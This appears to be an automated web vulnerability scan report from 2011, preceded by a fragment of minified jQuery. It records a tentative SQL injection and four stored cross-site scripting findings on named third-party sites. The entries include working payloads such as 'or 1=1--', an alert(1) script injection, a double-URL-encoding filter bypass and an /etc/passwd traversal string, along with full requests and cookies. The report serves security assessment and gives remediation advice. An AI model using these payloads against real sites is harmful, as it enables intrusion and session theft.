(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.child
...[SNIP]...
|
1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://www.bradsdeals.com |
| Path: |
/res/opt/screen.css |
Issue detail
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 19496541%20or%201%3d1--%20 and 19496541%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /res/opt/screen.css?v=2011061619496541%20or%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
|
Response 1
HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:33 GMT
Connection: close
Content-Length: 1305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
</head>
<body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">5643-8923-23FA-8C9B</div>
</div>
</body>
</html>
|
Request 2
GET /res/opt/screen.css?v=2011061619496541%20or%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=40626594; CFTOKEN=23649149; TID=306656; LB-Persist=/pPhdebA/HT971C4FjQO/6Xok17iTa3KEc4Lh3NCVVGPLf87tgiQBEUoPmU9nYohCXdgBLGdk6jTDw==
|
Response 2
HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 29 Aug 2011 21:05:43 GMT
Accept-Ranges: bytes
ETag: "80ede6698f66cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:34 GMT
Content-Length: 69864
body{color:#666;background:#fff;font:75%/140% Arial,Tahoma,Verdana,Helvetica,sans-serif;margin:0;padding:0;}table{border-spacing:0;border-collapse:collapse;}ul,ol{margin:.25em 0 1em 2em;padding-left:0;}li{margin-top:.25em;margin-bottom:.5em;}dt{font-weight:bold;margin:.5em 0 .12em 0;}dd{margin:.12em 0 .5em 0;}fieldset{margin:32px 0;padding:12px;border:1px solid #ccc;}legend{font-size:16px;color:#666;}button,input{font-size:100%;font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;}a{color:#3c85de;text-decoration:none;}a.hover,a:hover{text-decoration:underline;}a img{border:none;}h1,h2,.h2,h3,h4,h5,h6{font-family:Arial,Tahoma,Verdana,Helvetica,sans-serif;line-height:120%;margin:0;}h1{font-size:220%;margin:.25em 0 .75em;font-weight:normal;}h2,.h2{font-size:200%;margin:1em 0 .5em;font-weight:normal;}h3{font-size:135%;margin:0 0 .5em;font-weight:normal;}h4{font-size:100%;margin:0;}h5{font-size:90%;}h6{font-size:80%;}h1.divider,h2.divider,.h2.divider{border-bottom:1px solid #ddd;padding-bottom:.5em;height:1%;}p{margin-top:1em;margin-bottom:1em;}b,strong{font-weight:bold;}i,em{font-style:oblique;}blockquote{margin:1em 3em;}.hr hr{display:none;}.skipper{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.hide{position:absolute;left:-5000px;top:0;width:1px;height:1px;overflow:hidden;}.error{color:#AF0000;}img{-ms-interpolation-mode:bicubic;}.cfx:after{content:".";display:block;height:0;clear:both;visibility:hidden;}.cfx:after{line-height:0;}.cfx{display:inline-block;}/* Hides from IE-mac \*/ * html .cfx{height:1%;}.cfx{display:block;}/* End hide from IE-mac */body{background:#f8faeb url("../images/bg_body_tile.jpg") top center repeat;}#pageBounds{background:transparent url("../images/bg_body_top.jpg") top center repeat-x;}body.iframe{background:#fff none;padding:10px 20px;}#content{width:948px;margin:0 auto;position:relative;}#mainColumn{float:left;padding:0 4px;width:580px;margin:0;position:relative;z-index:4;}#topRightColumn,#sideColumn{float:righ
...[SNIP]...
|
2. Cross-site scripting (stored)
previous
next
There are 4 instances of this issue:
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03 was submitted in the pid parameter. This input was returned as 35525<script>alert(1)</script>f2ebf4b3f03 in a subsequent request for the URL /bmx3/broker.pli.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /bmx3/broker.pli?pid=35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282
|
Request 2
GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282
|
Response 2
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=26&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:37 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30216
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282../../../../../../../../etc/passwd%009cc29993-80.67.74.150-1314836282', "ar_35525<script>alert(1)</script>f2ebf4b3f03": 'exp=1&initExp=Sat Sep 17 00:54:37 2011&recExp=Sat Sep 17 00:54:37 2011&prad=348445181&arc=233006068&', "BMX_3PC": '1', "ar_p63514475250d16deff7e44d5a47a3990": 'exp=1&initExp=Sat Sep 17 00:54:33 2
...[SNIP]...
|
2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/bar/v16-507/d3/jsc/fm.js |
Issue detail
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 284b8'-alert(1)-'04109d7f66c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request 1
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=284b8'-alert(1)-'04109d7f66c&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Request 2
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Response 2
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:27:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:49:38 GMT
Date: Sat, 17 Sep 2011 01:49:20 GMT
Content-Length: 2692
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';
...[SNIP]...
|
2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/bar/v16-507/d3/jsc/fm.js |
Issue detail
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 5969c"-alert(1)-"5ef3bafc3c0 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request 1
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=5969c"-alert(1)-"5ef3bafc3c0&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Request 2
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Response 2
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:19:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=21
Expires: Sat, 17 Sep 2011 01:49:37 GMT
Date: Sat, 17 Sep 2011 01:49:16 GMT
Content-Length: 2692
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";z="+Math.random();}
if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';
var zzhasAd=undefined;
...[SNIP]...
|
2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://livechat.iadvize.com |
| Path: |
/chat_init.js |
Issue detail
The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 2e364<script>alert(1)</script>b793934a58c was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c; 1821vvc=3; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D
|
Request 2
GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1821vvc=2; vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62
|
Response 2
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:08 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb793934a58c; expires=Sun, 15-Sep-2013 21:55:08 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A6%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A21936835.13%2C%22navTime%22%3A1316210108000%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42132
if(typeof(iAdvize) !== 'object'){
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
var newNode = docume
...[SNIP]...
iframe.name = name;
iframe.src = 'javascript:false';
div.appendChild(iframe);
form.action = 'http://livechat.iadvize.com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c';
form.method = 'POST';
form.target = name;
div.appendChild(form);
form.submit();
}, 10);
}
if(typeof(iAdvize2) === 'undefined'){
iAdvize2 = {}
}
/*! LAB.js (LABjs :: Loading And Blockin
...[SNIP]...
|
3. HTTP header injection
previous
next
There are 4 instances of this issue:
Issue background
